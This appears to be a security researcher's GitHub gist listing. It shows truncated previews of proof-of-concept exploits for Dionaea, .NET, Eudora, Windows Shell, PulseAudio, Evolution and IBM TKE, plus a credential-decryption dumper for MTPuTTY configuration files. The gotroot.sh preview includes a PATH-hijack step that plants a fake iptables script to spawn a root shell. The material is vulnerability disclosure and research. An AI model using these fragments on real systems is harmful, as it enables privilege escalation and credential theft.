Yorick Koster ykoster
ykoster
/ dionaea_attach_database.py
Created
November 19, 2019 15:25
Dionaea honeypot allows the "ATTACH DATABASE" command, which can be used to attach to any local SQLite database on which the Dionaea process has read access. If Dionaea has write access, it is even possible to make changes to the database. This includes the logging database (when used) and sipaccounts database.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import MySQLdb | |
| host = '127.0.0.1' | |
| port = 3306 | |
| user = 'root' | |
| passwd = 'passwd' | |
| dbs = ['/opt/dionaea/var/lib/dionaea/dionaea.sqlite', '/opt/dionaea/var/lib/dionaea/sip/accounts.sqlite'] | |
| conn = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd) |
ykoster
/ ms12_025_dotnet_encoderparameter.rb
Created
October 7, 2019 12:36
.NET Framework EncoderParameter integer overflow vulnerability - proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache | |
| ## | |
| require 'msf/core' | |
| require 'base64' | |
| require 'digest/sha1' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* ----------------------------------------------------------------------------- | |
| * Enhanced Meta File arbitrary memory access vulnerability | |
| * Revision 0.1, Yorick Koster, November 5th, 2004 | |
| * ----------------------------------------------------------------------------- | |
| * Summary: | |
| * --------- | |
| * An memory access flaw has been discovered in the | |
| * GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash | |
| * programs that call this function. Furthermore, it is also possible to copy | |
| * arbitrary parts of memory into a buffer that is passed to the |
ykoster
/ EudoraBoF.c
Created
October 7, 2019 12:33
Eudora 5.2.1 buffer overflow through overly long attachment filename - proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Summary : Eudora 5.2.1 has a remotely exploitable buffer overflow | |
| * This vulnerability can be exploited by spoofing an attachment | |
| * that has an overly long filename. An overly long filename will | |
| * cause ECX to be overwritten, this value is later used in EIP, | |
| * thus allowing the execution of arbitrary code. | |
| * Note that the filename must begin with a backslash character | |
| * in order to trigger the buffer overflow. Dot characters are | |
| * not needed, but will trigger the buffer overflow sooner | |
| * |
ykoster
/ parse_srv.c.diff
Created
October 7, 2019 12:31
MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004 | |
| +++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004 | |
| @@ -28,6 +28,450 @@ | |
| #undef DBGC_CLASS | |
| #define DBGC_CLASS DBGC_RPC_PARSE | |
| +/* | |
| + * Exploit code for "Microsoft's Explorer and Internet Explorer long | |
| + * share name buffer overflow" discovered by Rodrigo Gutierrez. | |
| + * $rev 1.5, Yorick Koster, June 12, 2004 |
ykoster
/ pa_race.sh
Created
October 1, 2019 14:29
PulseAudio local race condition privilege escalation vulnerability - proof of concept (https://www.akitasecurity.nl/advisory/AK20090602/pulseaudio_local_race_privilege_escalation_vulnerability.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| pulseaudio=`which pulseaudio` | |
| workdir="/tmp" | |
| #workdir=$HOME | |
| id=`which id` | |
| shell=`which sh` | |
| trap cleanup INT |
ykoster
/ evolution_tnef_plugin_multil.rb
Created
October 1, 2019 14:10
yTNEF/Evolution TNEF Attachment decoder plugin directory traversal & buffer overflow vulnerabilities - proof of concept (https://www.akitasecurity.nl/advisory/AK20090601/ytnef_evolution_tnef_plugin_traversal___overflow_vulnerabilities.html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| include Msf::Exploit::Remote::SMTPDeliver | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities', | |
| 'Description' => %q{ |
ykoster
/ Invoke-MTPuTTYConfigDump.psm1
Last active
February 27, 2024 13:50
Invoke-MTPuTTYConfigDump - read an MTPuTTY configuration file, decrypt the passwords and dump the result
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Synopsis | |
| Decrypt an MTPuTTY configuration file | |
| .Description | |
| Read an MTPuTTY configuration file, decrypt the passwords and dump the result | |
| .Parameter ConfigFile | |
| Path to the MTPuTTY configuration file |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* --------------------------------------------------------------------- | |
| * mordan.c | |
| * revision 0.4 | |
| * --------------------------------------------------------------------- | |
| * November 2005, Yorick Koster, ITsec Security Services | |
| * --------------------------------------------------------------------- | |
| * Mordan is a program that can be used to determine the internal state | |
| * of the java.util.Random() random number generator. In order to do so, | |
| * mordan requires two integer values (created with Random.nextInt()) | |
| * or one long value (created with Random.nextLong()). |
ykoster
/ gotroot.sh
Created
March 31, 2019 07:28
IBM Trusted Key Entry (TKE) workstation local privilege escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| OLDPATH=$PATH | |
| trap cleanup EXIT | |
| export PATH=.:$PATH | |
| /bin/cat > $HOME/iptables << __EOF | |
| #!/bin/bash | |
| /bin/su -c /usr/bin/xterm | |
| __EOF |